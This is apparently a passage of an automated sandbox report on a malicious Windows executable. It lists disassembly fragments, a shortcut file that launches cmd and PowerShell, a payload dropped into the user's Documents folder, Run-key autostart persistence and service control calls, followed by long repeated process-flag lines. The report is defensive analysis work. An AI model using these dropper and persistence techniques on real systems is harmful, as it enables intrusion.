                      Source: C:\Users\user\AppData\Local\Temp\854113748.exeCode function: 29_3_0060D2FB push edi; ret 29_3_0060D2CC
                      Source: C:\Users\user\AppData\Local\Temp\854113748.exeCode function: 29_3_0060BC39 push ecx; ret 29_3_0060BC59
                      Source: C:\Users\user\AppData\Local\Temp\854113748.exeCode function: 29_3_0060DD01 push esi; ret 29_3_0060DD6A
                      Source: C:\Users\user\AppData\Local\Temp\854113748.exeCode function: 29_3_0060FE8F push esi; ret 29_3_0060FEA1
                      Source: C:\Users\user\AppData\Local\Temp\854113748.exeCode function: 29_3_00609F6A push eax; ret 29_3_00609F75
                      Source: C:\Users\user\AppData\Local\Temp\854113748.exeCode function: 29_2_0044C190 pushfd ; iretd 29_2_0044C1EF
                      Source: C:\Users\user\AppData\Local\Temp\854113748.exeCode function: 29_2_0044B2B0 pushfd ; ret 29_2_0044B2CA
                      Source: C:\Users\user\AppData\Local\Temp\854113748.exeCode function: 29_2_00473991 push ecx; ret 29_2_004739A4
                      Source: C:\Users\user\AppData\Local\Temp\854113748.exeCode function: 29_2_00434CDF pushfd ; retf 29_2_0044287B
                      Source: C:\Users\user\AppData\Local\Temp\854113748.exeCode function: 29_2_0044BC80 pushfd ; iretd 29_2_0044BCE7
                      Source: C:\Users\user\AppData\Local\Temp\854113748.exeCode function: 29_2_0043ED50 pushfd ; retf 29_2_0043ED5C
                      Source: C:\Users\user\AppData\Local\Temp\854113748.exeCode function: 29_2_00439DF3 pushfd ; ret 29_2_00439E59
                      Source: C:\Users\user\AppData\Local\Temp\854113748.exeCode function: 29_2_00433FF1 push ss; retf 29_2_00433FF2
                      Source: C:\Users\user\AppData\Local\Temp\854113748.exeCode function: 29_2_00437FA3 pushfd ; iretd 29_2_00439EA1
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeCode function: 30_3_03226F0F push esi; ret 30_3_03226F21

                      Persistence and Installation Behavior

                      barindex
                      Windows shortcut file (LNK) starts blacklisted processes
                      Source: LNK fileProcess created: C:\Windows\System32\cmd.exe
                      Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      Source: LNK fileProcess created: C:\Windows\System32\cmd.exe
                      Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeJump to behavior
                      Source: LNK fileProcess created: C:\Windows\System32\cmd.exeJump to behavior
                      Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      Drops PE files to the document folder of the user
                      Source: C:\Users\user\AppData\Local\Temp\854113748.exeFile created: C:\Users\user\Documents\Perfectouin\Bin\PerfectouinVans.exeJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\854113748.exeFile created: C:\Users\user\Documents\Perfectouin\Bin\PerfectouinVans.exeJump to dropped file
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\854113748.exeJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\854113748.exeCode function: 26_2_00411150 FindFirstFileW,GetPrivateProfileStringW,GetPrivateProfileStringW,GetPrivateProfileStringW,StrFormatByteSizeW,GetPrivateProfileStringW,FindNextFileW,FindClose,26_2_00411150
                      Source: C:\Users\user\AppData\Local\Temp\854113748.exeCode function: 26_2_004112B7 GetPrivateProfileStringW,GetPrivateProfileStringW,GetPrivateProfileStringW,StrFormatByteSizeW,GetPrivateProfileStringW,FindNextFileW,FindClose,26_2_004112B7
                      Source: C:\Users\user\AppData\Local\Temp\854113748.exeCode function: 26_2_004112B9 GetPrivateProfileStringW,GetPrivateProfileStringW,GetPrivateProfileStringW,StrFormatByteSizeW,GetPrivateProfileStringW,FindNextFileW,FindClose,26_2_004112B9
                      Source: C:\Users\user\AppData\Local\Temp\854113748.exeCode function: 29_2_00411150 FindFirstFileW,GetPrivateProfileStringW,GetPrivateProfileStringW,GetPrivateProfileStringW,StrFormatByteSizeW,GetPrivateProfileStringW,FindNextFileW,FindClose,29_2_00411150
                      Source: C:\Users\user\AppData\Local\Temp\854113748.exeCode function: 29_2_004112B7 GetPrivateProfileStringW,GetPrivateProfileStringW,GetPrivateProfileStringW,StrFormatByteSizeW,GetPrivateProfileStringW,FindNextFileW,FindClose,29_2_004112B7
                      Source: C:\Users\user\AppData\Local\Temp\854113748.exeCode function: 29_2_004112B9 GetPrivateProfileStringW,GetPrivateProfileStringW,GetPrivateProfileStringW,StrFormatByteSizeW,GetPrivateProfileStringW,FindNextFileW,FindClose,29_2_004112B9

                      Boot Survival

                      barindex
                      Creates multiple autostart registry keys
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run MicrosoftEdgeAutoLaunch_C366A24065C39A1BE76E148DC2D0A868Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\854113748.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run PerfectouinVans
                      Source: C:\Users\user\AppData\Local\Temp\854113748.exeCode function: 26_2_0041B4B0 OpenSCManagerW,OpenServiceW,CloseServiceHandle,QueryServiceStatus,QueryServiceStatus,ControlService,QueryServiceStatus,Sleep,QueryServiceStatus,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,StartServiceW,QueryServiceStatus,Sleep,Sleep,QueryServiceStatus,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,26_2_0041B4B0
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run MicrosoftEdgeAutoLaunch_C366A24065C39A1BE76E148DC2D0A868Jump to behavior
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run MicrosoftEdgeAutoLaunch_C366A24065C39A1BE76E148DC2D0A868Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\854113748.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run PerfectouinVans
                      Source: C:\Users\user\AppData\Local\Temp\854113748.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run PerfectouinVans

                      Hooking and other Techniques for Hiding and Protection

                      barindex
                      Loading BitLocker PowerShell Module
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\854113748.exeCode function: 26_2_0041F8D0 IsIconic,SendMessageW,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetClientRect,DrawIcon,26_2_0041F8D0
                      Source: C:\Users\user\AppData\Local\Temp\854113748.exeCode function: 29_2_0041F8D0 IsIconic,SendMessageW,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetClientRect,DrawIcon,29_2_0041F8D0
                      Source: C:\Users\user\AppData\Local\Temp\854113748.exeCode function: 29_2_00420B40 IsIconic,29_2_00420B40
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
